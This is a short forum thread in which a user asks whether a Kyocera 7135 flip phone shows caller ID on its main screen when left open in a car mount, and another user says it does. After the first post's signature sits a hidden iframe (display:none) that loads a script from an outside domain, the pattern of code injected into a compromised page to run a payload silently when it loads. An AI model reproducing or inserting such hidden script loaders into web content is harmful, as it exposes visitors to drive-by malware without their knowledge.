+ Reply to Thread

Caller ID Info on Main Screen

Hi,

I know I have asked this question before, but now that 7135's are available I would love a more definitive answer.

Let's assume I want to use the phone in my car, and I put it in a 3rd party holder attached to my dash. When closed the main LCD screen is not visible, and since the aux. LCD is on top I wouldn't be able to see that either. Is it possible to keep the main screen open, and see the caller ID info when a call comes in?

Thanks -- can't wait to get mine.

Dawn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes, you don't "have" to keep the flip closed. If you have external power supplied, it will stay on. If no external power is supplied, the screen will shut off after the time period you choose. When a message or call comes in, it will illuminate and display all the info you are looking for.

Originally posted by HoTSynC
    Yes, you don't "have" to keep the flip closed. If you have external power supplied, it will stay on. If no external power is supplied, the screen will shut off after the time period you choose. When a message or call comes in, it will illuminate and display all the info you are looking for.

Thanks. It looks like the folks at Kyocera did their homework!

Dawn